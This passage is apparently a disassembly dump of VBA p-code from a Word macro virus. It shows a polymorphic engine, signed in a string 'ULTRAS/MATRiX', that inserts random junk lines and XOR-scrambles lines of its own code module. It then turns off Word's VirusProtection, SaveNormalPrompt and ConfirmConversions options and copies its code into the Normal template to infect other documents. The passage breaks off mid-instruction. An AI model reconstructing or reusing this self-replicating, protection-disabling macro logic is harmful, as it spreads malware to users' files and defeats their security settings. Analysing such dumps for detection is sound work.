' Line #159:
' 	Ld num 
' 	LitDI2 0x0004 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0003 "If "
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0003 " = "
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x002D 
' 	Mul 
' 	FnInt 
' 	Coerce (Str) 
' 	Concat 
' 	LitStr 0x0005 "Then "
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x0019 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0003 " = "
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x002D 
' 	Mul 
' 	FnInt 
' 	Coerce (Str) 
' 	Concat 
' 	St zom$ 
' 	EndIf 
' Line #160:
' Line #161:
' 	Ld num 
' 	LitDI2 0x0005 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0014 "On Error Resume Next"
' 	St zom$ 
' 	EndIf 
' Line #162:
' Line #163:
' 	Ld num 
' 	LitDI2 0x0006 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0021 "Application.ActiveWindow.Activate"
' 	St zom$ 
' 	EndIf 
' Line #164:
' Line #165:
' 	Ld num 
' 	LitDI2 0x0007 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0020 "Options.SaveNormalPrompt = False"
' 	St zom$ 
' 	EndIf 
' Line #166:
' Line #167:
' 	Ld num 
' 	LitDI2 0x0008 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0022 "Options.InsertedTextColor = wdAuto"
' 	St zom$ 
' 	EndIf 
' Line #168:
' Line #169:
' 	Ld num 
' 	LitDI2 0x0009 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x001D "Options.BackgroundSave = True"
' 	St zom$ 
' 	EndIf 
' Line #170:
' Line #171:
' 	Ld xz 
' 	Ld zom$ 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #172:
' Line #173:
' 	StartForVariable 
' 	Ld xz 
' 	EndForVariable 
' 	NextVar 
' Line #174:
' Line #175:
' 	LitDI2 0x0020 
' 	LitStr 0x0031 "'Zd0B SHi ZduB p0LyM0RHiC ENGiNe By ULTRAS/MATRiX"
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #176:
' Line #177:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	LitDI2 0x0022 
' 	LitDI2 0x006A 
' 	For 
' Line #178:
' Line #179:
' 	LitVarSpecial (Null)
' 	St ZSZPE2 
' Line #180:
' Line #181:
' 	LitStr 0x0001 "'"
' 	Ld ZSZPE1 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	Concat 
' 	St ZSZPE3 
' Line #182:
' Line #183:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0008 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St ZSZPE4 
' Line #184:
' Line #185:
' 	StartForVariable 
' 	Ld ZSZPE5 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ZSZPE3 
' 	FnLen 
' 	For 
' Line #186:
' Line #187:
' 	Ld ZSZPE3 
' 	Ld ZSZPE5 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld ZSZPE4 
' 	Xor 
' 	St ZSZPE6 
' Line #188:
' Line #189:
' 	Ld ZSZPE2 
' 	Ld ZSZPE6 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St ZSZPE2 
' Line #190:
' Line #191:
' 	StartForVariable 
' 	Ld ZSZPE5 
' 	EndForVariable 
' 	NextVar 
' Line #192:
' Line #193:
' 	Ld ZSZPE2 
' 	St ZSZPE7 
' Line #194:
' Line #195:
' 	Ld ZSZPE1 
' 	LitStr 0x0001 "'"
' 	Ld ZSZPE7 
' 	Concat 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #196:
' Line #197:
' 	StartForVariable 
' 	Ld ZSZPE1 
' 	EndForVariable 
' 	NextVar 
' Line #198:
' Line #199:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #200:
' Line #201:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #202:
' Line #203:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #204:
' Line #205:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St TD 
' Line #206:
' Line #207:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #208:
' Line #209:
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CountOfLines 
' 	Ld NT 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #210:
' Line #211:
' 	Ld TD 
' 	Ld NT 
' 	ArgsMemCall AddFromString 0x0001 
' Line #212:
' Line #213:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
…